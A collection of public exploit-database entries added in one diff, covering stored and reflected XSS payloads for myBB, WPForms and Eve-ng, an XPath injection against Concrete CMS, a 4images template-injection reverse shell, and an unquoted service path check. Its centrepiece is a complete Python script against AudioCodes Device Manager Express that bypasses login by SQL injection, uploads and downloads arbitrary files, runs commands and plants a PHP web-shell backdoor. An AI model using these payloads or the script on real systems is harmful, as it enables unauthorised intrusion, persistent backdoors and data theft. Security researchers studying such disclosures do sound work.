# Exploit Title: myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Andrey Stoykov
# Software Link: https://mybb.com/versions/1.8.26/
# Version: 1.8.26
# Tested on: Ubuntu 20.04
Stored XSS #1:
To reproduce do the following:
1. Login as administrator user
2. Browse to "Templates and Style" -> "Templates" -> "Manage Templates" -> =
"Global Templates"=20
3. Select "Add New Template" and enter payload "><img src=3Dx onerror=3Dale=
rt(1)>
// HTTP POST request showing XSS payload
POST /mybb_1826/admin/index.php?module=3Dstyle-templates&action=3Dedit_temp=
late HTTP/1.1
Host: 192.168.139.132
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=
101 Firefox/106.0
[...]
my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr=
or=3Dalert(1)>&sid=3D-1&template=3D&continue=3DSave+and+Continue+Editing
// HTTP redirect response to specific template
HTTP/1.1 302 Found
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=
erl/v5.16.3
Location: index.php?module=3Dstyle-templates&action=3Dedit_template&title=
=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&sid=3D-1
[...]
// HTTP GET request to newly created template
GET /mybb_1826/admin/index.php?module=3Dstyle-templates&sid=3D-1 HTTP/1.1
Host: 192.168.139.132
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=
101 Firefox/106.0
[...]
// HTTP response showing unsanitized XSS payload
HTTP/1.1 200 OK
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=
erl/v5.16.3
X-Powered-By: PHP/5.6.40
[...]
<tr class=3D"first">
<td class=3D"first"><a href=3D"index.php?module=3Dstyle-templates&actio=
n=3Dedit_template&title=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3=
E&sid=3D-1">"><img src=3Dx onerror=3Dalert(1)></a></td>
[...]
Stored XSS #2:
To reproduce do the following:
1. Login as administrator user
2. Browse to "Forums and Posts" -> "Forum Management"
3. Select "Add New Forum" and enter payload "><script>alert(1)</script>
// HTTP POST request showing XSS payload
POST /mybb_1826/admin/index.php?module=3Dforum-management&action=3Dadd HTTP=
/1.1
Host: 192.168.139.132
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=
101 Firefox/106.0
[...]
my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&type=3Df&title=3D"><script>a=
lert(1)</script>&description=3D"><script>alert(2)</script[...]
// HTTP response showing successfully added a new forum
HTTP/1.1 200 OK
Date: Sun, 20 Nov 2022 11:00:28 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=
erl/v5.16.3
[...]
// HTTP GET request to fetch forums
GET /mybb_1826/admin/index.php?module=3Dforum-management HTTP/1.1
Host: 192.168.139.132
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=
101 Firefox/106.0
[...]
// HTTP response showing unsanitized XSS payload
HTTP/1.1 200 OK
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=
erl/v5.16.3
[...]
<small>Sub Forums: <a href=3D"index.php?module=3Dforum-management&fid=
=3D3">"><script>alert(1)</script></a></small>
Stored XSS #3:
To reproduce do the following:
1. Login as administrator user
2. Browse to "Forums and Posts" -> "Forum Announcements"
3. Select "Add Announcement" and enter payload "><img+src=3Dx+onerror=3Dale=
rt(1)>
// HTTP POST request showing XSS payload
POST /mybb_1826/admin/index.php?module=3Dforum-announcements&action=3Dadd H=
TTP/1.1
Host: 192.168.139.132
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=
101 Firefox/106.0
[...]
my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr=
or=3Dalert(1)>&starttime_day=3D20&starttime_month=3D11&starttime_year=3D202=
2&starttime_time=3D11:05+AM&endtime_day=3D20&endtime_month=3D11&endtime_yea=
r=3D2023&endtime_time=3D11:05+AM&endtime_type=3D2&message=3D"><script>alert=
(2)</script>&fid=3D2&allowmycode=3D1&allowsmilies=3D1
// HTTP response showing successfully added an anouncement
HTTP/1.1 302 Found
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=
erl/v5.16.3
[...]
// HTTP GET request to fetch forum URL
GET /mybb_1826/ HTTP/1.1
Host: 192.168.139.132
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=
101 Firefox/106.0
[...]
// HTTP response showing unsanitized XSS payload
HTTP/1.1 200 OK
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=
erl/v5.16.3
[...]
<a href=3D"forumdisplay.php?fid=3D3" title=3D"">"><script>alert(1)</script>=
</a>
--sgnirk-590ebdc0-1da1-4f35-a731-39a2519b1c0d--

57
exploits/php/webapps/51140.txt Normal file
View file

@ -0,0 +1,57 @@
## Title: Ecommerse v1.0 - Cross-Site Scripting (XSS)
## Author: nu11secur1ty
## Date: 11.23.2022
## Vendor: https://github.com/winston-dsouza
## Software: https://github.com/winston-dsouza/ecommerce-website
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website
## Description:
The value of the eMail request parameter is copied into the value of
an HTML tag attribute which is encapsulated in double quotation marks.
The attacker can trick the users of this system, very easy to visit a
very dangerous link from anywhere, and then the game will over for
these customers.
Also, the attacker can create a network from botnet computers by using
this vulnerability.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Exploit:
```POST
POST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://localhost
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f
Origin: http://pwnedhost.com
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/ecommerce/index.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website)
## Proof and Exploit:
[href](https://streamable.com/3r4t36)
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

265
exploits/php/webapps/51144.txt Normal file
View file

@ -0,0 +1,265 @@
## Exploit Title: Concrete5 CME v9.1.3 - Xpath injection
## Author: nu11secur1ty
## Date: 11.28.2022
## Vendor: https://www.concretecms.org/
## Software: https://www.concretecms.org/download
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3
## Description:
The URL path folder `3` appears to be vulnerable to XPath injection attacks.
The test payload 50539478' or 4591=4591-- was submitted in the URL
path folder `3`, and an XPath error message was returned.
The attacker can flood with requests the system by using this
vulnerability to untilted he receives the actual paths of the all
content of this system which content is stored on some internal or
external server.
## STATUS: HIGH Vulnerability
[+] Exploits:
00:
```GET
GET /concrete-cms-9.1.3/index.php/ccm50539478'%20or%204591%3d4591--%20/assets/localization/moment/js
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```
[+] Response:
```HTTP
HTTP/1.1 500 Internal Server Error
Date: Mon, 28 Nov 2022 15:32:22 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Powered-By: PHP/7.4.30
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 592153
<!DOCTYPE html><!--
Whoops\Exception\ErrorException: include(): Failed opening
&#039;C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/application/files/cache/expensive\0fea6a13c52b4d47\25368f24b045ca84\38a865804f8fdcb6\57cd99682e939275\3e7d68124ace5663\5a578007c2573b03\d35376a9b3047dec\fee81596e3895419.php&#039;
for inclusion (include_path=&#039;C:/xampp/htdocs/pwnedhost/concrete-cms-9.1.3/concrete/vendor;C:\xampp\php\PEAR&#039;)
in file C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php
on line 26
Stack trace:
1. Whoops\Exception\ErrorException->()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
2. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem\NativeEncoder.php:26
3. Stash\Driver\FileSystem\NativeEncoder->deserialize()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Driver\FileSystem.php:201
4. Stash\Driver\FileSystem->getData()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:631
5. Stash\Item->getRecord()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:321
6. Stash\Item->executeGet()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:252
7. Stash\Item->get()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\tedivm\stash\src\Stash\Item.php:346
8. Stash\Item->isMiss()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Cache\Adapter\LaminasCacheDriver.php:67
9. Concrete\Core\Cache\Adapter\LaminasCacheDriver->internalGetItem()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-cache\src\Storage\Adapter\AbstractAdapter.php:356
10. Laminas\Cache\Storage\Adapter\AbstractAdapter->getItem()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:601
11. Laminas\I18n\Translator\Translator->loadMessages()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:434
12. Laminas\I18n\Translator\Translator->getTranslatedMessage()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\vendor\laminas\laminas-i18n\src\Translator\Translator.php:349
13. Laminas\I18n\Translator\Translator->translate()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Localization\Translator\Adapter\Laminas\TranslatorAdapter.php:69
14. Concrete\Core\Localization\Translator\Adapter\Laminas\TranslatorAdapter->translate()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\bootstrap\helpers.php:27
15. t() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\blocks\top_navigation_bar\view.php:47
16. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Block\View\BlockView.php:267
17. Concrete\Core\Block\View\BlockView->renderViewContents()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
18. Concrete\Core\View\AbstractView->render()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\Area.php:853
19. Concrete\Core\Area\Area->display()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Area\GlobalArea.php:128
20. Concrete\Core\Area\GlobalArea->display()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\elements\header.php:11
21. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:125
22. Concrete\Core\View\View->inc()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\themes\atomik\view.php:4
23. include() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:329
24. Concrete\Core\View\View->renderTemplate()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\View.php:291
25. Concrete\Core\View\View->renderViewContents()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\View\AbstractView.php:164
26. Concrete\Core\View\AbstractView->render()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\controllers\single_page\page_not_found.php:19
27. Concrete\Controller\SinglePage\PageNotFound->view()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
28. call_user_func_array()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Controller\AbstractController.php:318
29. Concrete\Core\Controller\AbstractController->runAction()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:188
30. Concrete\Core\Http\ResponseFactory->controller()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:95
31. Concrete\Core\Http\ResponseFactory->notFound()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:390
32. Concrete\Core\Http\ResponseFactory->collectionNotFound()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\ResponseFactory.php:234
33. Concrete\Core\Http\ResponseFactory->collection()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:132
34. Concrete\Core\Http\DefaultDispatcher->handleDispatch()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultDispatcher.php:60
35. Concrete\Core\Http\DefaultDispatcher->dispatch()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\DispatcherDelegate.php:39
36. Concrete\Core\Http\Middleware\DispatcherDelegate->next()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\FrameOptionsMiddleware.php:39
37. Concrete\Core\Http\Middleware\FrameOptionsMiddleware->process()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
38. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\StrictTransportSecurityMiddleware.php:36
39. Concrete\Core\Http\Middleware\StrictTransportSecurityMiddleware->process()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
40. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ContentSecurityPolicyMiddleware.php:36
41. Concrete\Core\Http\Middleware\ContentSecurityPolicyMiddleware->process()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
42. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\CookieMiddleware.php:35
43. Concrete\Core\Http\Middleware\CookieMiddleware->process()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
44. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\ApplicationMiddleware.php:29
45. Concrete\Core\Http\Middleware\ApplicationMiddleware->process()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareDelegate.php:50
46. Concrete\Core\Http\Middleware\MiddlewareDelegate->next()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\Middleware\MiddlewareStack.php:86
47. Concrete\Core\Http\Middleware\MiddlewareStack->process()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Http\DefaultServer.php:85
48. Concrete\Core\Http\DefaultServer->handleRequest()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\Run\DefaultRunner.php:125
49. Concrete\Core\Foundation\Runtime\Run\DefaultRunner->run()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\src\Foundation\Runtime\DefaultRuntime.php:102
50. Concrete\Core\Foundation\Runtime\DefaultRuntime->run()
C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\concrete\dispatcher.php:45
51. require() C:\xampp\htdocs\pwnedhost\concrete-cms-9.1.3\index.php:2
--><html>
<head>
<meta charset="utf-8">
<meta name="robots" content="noindex,nofollow"/>
<meta name="viewport" content="width=device-width,
initial-scale=1, shrink-to-fit=no"/>
<title>Concrete CMS has encountered an issue.</title>
<style>body {
font: 12px "Helvetica Neue", helvetica, arial, sans-serif;
color: #131313;
background: #eeeeee;
padding:0;
margin: 0;
max-height: 100%;
text-rendering: optimizeLegibility;
}
a {
text-decoration: none;
}
.Whoops.container {
position: relative;
z-index: 9999999999;
}
.panel {
overflow-y: scroll;
height: 100%;
position: fixed;
margin: 0;
left: 0;
top: 0;
}
.branding {
position: absolute;
top: 10px;
right: 20px;
color: #777777;
font-size: 10px;
z-index: 100;
}
.branding a {
color: #e95353;
}
header {
color: white;
box-sizing: border-box;
background-color: #2a2a2a;
padding: 35px 40px;
max-height: 180px;
overflow: hidden;
transition: 0.5s;
}
header.header-expand {
max-height: 1000px;
}
.exc-title {
margin: 0;
color: #bebebe;
font-size: 14px;
}
.exc-title-primary, .exc-title-secondary {
color: #e95353;
}
.exc-message {
font-size: 20px;
word-wrap: break-word;
margin: 4px 0 0 0;
color: white;
}
.exc-message span {
display: block;
}
.exc-message-empty-notice {
color: #a29d9d;
font-weight: 300;
}
.......
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/concretecms.org/2022/concretecms-9.1.3)
## Proof and Exploit:
[href](https://streamable.com/4f60ka)
## Time spent
`03:00:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

191
exploits/php/webapps/51145.py Executable file
View file

@ -0,0 +1,191 @@
# Exploit Title: Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE)
# Date: 02-12-22
# Exploit Author: 0xEF
# Vendor Homepage: https://www.audiocodes.com
# Software Link: https://ln5.sync.com/dl/82774fdd0/jwqwt632-s65tncqu-iwrtm7g3-iidti637
# Version: <= 7.8.20002.47752
# Tested on: Windows 10 & Windows Server 2019
# Default credentials: admin/admin
# SQL injection + Path traversal + Remote Command Execution
# CVE: CVE-2022-24627, CVE-2022-24629, CVE-2022-24630, CVE-2022-24632
#!/usr/bin/python3
import requests
import sys
import time
import re
import colorama
from colorama import Fore, Style
import uuid
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
def menu():
print('-----------------------------------------------------------------------\n'
'AudioCodes Device Manager Express 45 78 70 6C 6F 69 74 \n'
'-----------------------------------------------------------------------')
def optionlist(s,target):
try:
print('\nOptions: (Press any other key to quit)\n'
'-----------------------------------------------------------------------\n'
'1: Upload arbitrary file\n'
'2: Download arbitrary file\n'
'3: Execute command\n'
'4: Add backdoor\n'
'-----------------------------------------------------------------------')
option = int(input('Select: '))
if(option == 1):
t = 'a'
upload_file(s,target,t)
elif(option == 2):
download_file(s,target)
elif(option == 3):
execute(s,target)
elif(option == 4):
t = 'b'
upload_file(s,target,t)
except:
sys.exit()
def bypass_auth(target):
try:
print(f'\nTrying to bypass authentication..\n')
url = f'http://{target}/admin/AudioCodes_files/process_login.php'
s = requests.Session()
# CVE-2022-24627
payload_list = ['\'or 1=1#','\\\'or 1=1#','admin']
for payload in payload_list:
body = {'username':'admin','password':'','domain':'','p':payload}
r = s.post(url, data = body)
if('Configuration' in r.text):
print(f'{Fore.GREEN}(+) Authenticated as Administrator on: {target}{Style.RESET_ALL}')
time.sleep(1)
return(s)
else:
print(f'{Fore.RED}(-) Computer says no, can\'t login, try again..{Style.RESET_ALL}')
main()
except:
sys.exit()
def upload_file(s,target,t):
try:
url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?type='
param = uuid.uuid4().hex
file = input('\nEnter file name: ')
# read extension
ext = file.rsplit( ".", 1 )[ 1 ]
if (t=='b'):
# remove extension
file = file.rsplit( ".", 1 )[ 0 ] + '.php'
ext = 'php'
patch = '1'
if(file != ''):
if(patch_ext(s,target,patch,ext)):
# CVE-2022-24629
print(f'{Fore.GREEN}(+) Success{Style.RESET_ALL}')
if(t=='a'):
dest = input('\nEnter destination location (ex. c:\): ')
print(f'\nUploading file to {target}: {dest}{file}')
files = {'myfile': (file, open(file,'rb'), 'text/html')}
body = {'dir': f'{dest}', 'type': '', 'Submit': 'Upload'}
r = s.post(url, files=files, data=body)
print(f'{Fore.GREEN}(+) Done{Style.RESET_ALL}')
if(t=='b'):
shell = f'<?php echo shell_exec($_GET[\'{param}\']); ?>'
files = {f'myfile': (file, shell, 'text/html')}
body = {'dir': 'C:/audiocodes/express/WebAdmin/region/', 'type': '', 'Submit': 'Upload'}
r = s.post(url, files=files, data=body)
print(f'\nBackdoor location:')
print(f'{Fore.GREEN}(+) http://{target}/region/{file}?{param}=dir{Style.RESET_ALL}')
patch = '2'
time.sleep(1)
patch_ext(s,target,patch,ext)
else:
print(f'{Fore.RED}(-) Could not whitelist extension {ext}.. Try something else\n{Style.RESET_ALL}')
except:
print(f'{Fore.RED}(-) Computer says no..{Style.RESET_ALL}')
patch = '2'
patch_ext(s,target,patch,ext)
def download_file(s,target):
# CVE-2022-24632
try:
file = input('\nFull path to file, eg. c:\\windows\win.ini: ')
if(file != ''):
url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?view={file}'
r = s.get(url)
if (len(r.content) > 0):
print(f'{Fore.GREEN}\n(+) File {file} downloaded\n{Style.RESET_ALL}')
file = str(file).split('\\')[-1:][0]
open(file, 'wb').write(r.content)
else:
print(f'{Fore.RED}\n(-) File not found..\n{Style.RESET_ALL}')
else:
print(f'{Fore.RED}\n(-) Computer says no..\n{Style.RESET_ALL}')
except:
sys.exit()
def execute(s,target):
try:
while True:
# CVE-2022-24631
command = input('\nEnter a command: ')
if(command == ''):
optionlist(s,target)
break
print(f'{Fore.GREEN}(+) Executing: {command}{Style.RESET_ALL}')
body = 'ssh_command='+ command
url = f'http://{target}/admin/AudioCodes_files/BrowseFiles.php?cmd=ssh'
r = s.post(url, data = body, headers=headers)
print('-----------------------------------------------------------------------')
time.sleep(1)
print((", ".join(re.findall(r'</form>(.+?)</section>',str(r.content)))).replace('\\r\\n', '').replace('</div>', '').replace('<div>', '').replace('</DIV>', '').replace('<DIV>', '').replace('<br/>', '').lstrip())
print('-----------------------------------------------------------------------')
except:
sys.exit()
def patch_ext(s,target,opt,ext):
try:
if(opt == '1'):
print('\nTrying to add extension to whitelist..')
body = {'action':'saveext','extensions':f'.cab,.cfg,.csv,.id,.img,.{ext},.zip'}
if(opt == '2'):
print('\nCleaning up..')
body = {'action':'saveext','extensions':'.cab,.cfg,.csv,.id,.img,.zip'}
print(f'{Fore.GREEN}(+) {ext.upper()} extension removed\n{Style.RESET_ALL}')
url = f'http://{target}/admin/AudioCodes_files/ajax/ajaxGlobalSettings.php'
r = s.post(url, data = body, headers=headers)
time.sleep(1)
if(f'{ext}' in r.text):
return True
except:
sys.exit()
def main():
if len(sys.argv) != 2:
print(' Usage: ' + sys.argv[0] + ' <target IP>')
print(' Example: ' + sys.argv[0] + ' 172.16.86.154')
sys.exit(1)
target = sys.argv[1]
menu()
s = bypass_auth(target)
if(s):
optionlist(s,target)
if __name__ == '__main__':
main()
# Timeline
# 11-11-2021 Vulnerabilities discovered
# 12-11-2021 PoC written
# 15-11-2021 Details shared with vendor
# 02-12-2021 Vendor confirmed vulnerabilities
# 03-12-2021 CVE's requested
# 09-12-2021 Vendor replied with solution and notified customers
# 07-02-2022 Product EOL announced
# 10-03-2022 CVE's assigned
# 02-12-2022 Disclosure of findings

60
exploits/php/webapps/51147.txt Normal file
View file

@ -0,0 +1,60 @@
# Exploit Title: 4images 1.9 - Remote Command Execution (RCE)
# Exploit Author: Andrey Stoykov
# Software Link: https://www.4homepages.de/download-4images
# Version: 1.9
# Tested on: Ubuntu 20.04
To reproduce do the following:
1. Login as administrator user
2. Browse to "General" -> " Edit Templates" -> "Select Template Pack" -> "d=
efault_960px" -> "Load Theme"
3. Select Template "categories.html"
4. Paste reverse shell code
5. Click "Save Changes"
6. Browse to "http://host/4images/categories.php?cat_id=3D1"
// HTTP POST request showing reverse shell payload
POST /4images/admin/templates.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
101 Firefox/100.0
[...]
__csrf=3Dc39b7dea0ff15442681362d2a583c7a9&action=3Dsavetemplate&content=3D[=
REVERSE_SHELL_CODE]&template_file_name=3Dcategories.html&template_folder=3D=
default_960px[...]
// HTTP redirect response to specific template
GET /4images/categories.php?cat_id=3D1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100=
101 Firefox/100.0
[...]
# nc -kvlp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 43032
Linux kali 6.0.0-kali3-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.7-1kali1 (20=
22-11-07) x86_64 GNU/Linux
13:54:28 up 2:18, 2 users, load average: 0.09, 0.68, 0.56
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
kali tty7 :0 11:58 2:18m 2:21 0.48s xfce4-sessi=
on
kali pts/1 - 11:58 1:40 24.60s 0.14s sudo su
uid=3D1(daemon) gid=3D1(daemon) groups=3D1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$=20
--sgnirk-7d26becc-c589-46c6-a348-fe09d4b162fe--

13
exploits/php/webapps/51152.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: WPForms 1.7.8 - Cross-Site Scripting (XSS)
# Date: 2022-12-05
# Author: Milad karimi
# Software Link: https://wordpress.org/plugins/wpforms-lite
# Version: 1.7.8
# Tested on: Windows 10
# CVE: N/A
1. Description:
This plugin creates a WPForms from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
2. Proof of Concept:
https://$target/ListTable.php?foobar=<script>alert("Ex3ptionaL")</script>

18
exploits/php/webapps/51153.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS)
# Google Dork: N/A
# Date: 12/6/2022
# Exploit Author: @casp3r0x0 hassan ali al-khafaji
# Vendor Homepage: https://www.eve-ng.net/
# Software Link: https://www.eve-ng.net/index.php/download/
# Version: Free EVE Community Edition Version 5.0.1-13
# Tested on: Free EVE Community Edition Version 5.0.1-13
# CVE : N/A
#we could achieve stored XSS on eve-ng free I don't know If this
effect pro version also
#first create a new lab
#second create a Text label
#insert the xss payload and click save "><script>alert(1)</script>
#the application is multi user if any user open the lab the xss will be triggered.

31
exploits/windows/local/51143.txt Normal file
View file

@ -0,0 +1,31 @@
#Exploit Title: Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path
# Author: P4p4 M4n3
# Discovery Date: 25-11-2022
# Vendor Homepage: https://webcompanion.com/en/
# Version 4.1.0.409
# Tested on: Microsoft Windows Server 2019 Datacenter x64
# Description:
# Lavasoft 4.1.0.409 install DCIservice as a service with an unquoted service path
# POC https://youtu.be/yb8AavCMbes
#Discover the Unquoted Service path
C:\Users\p4p4\> wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
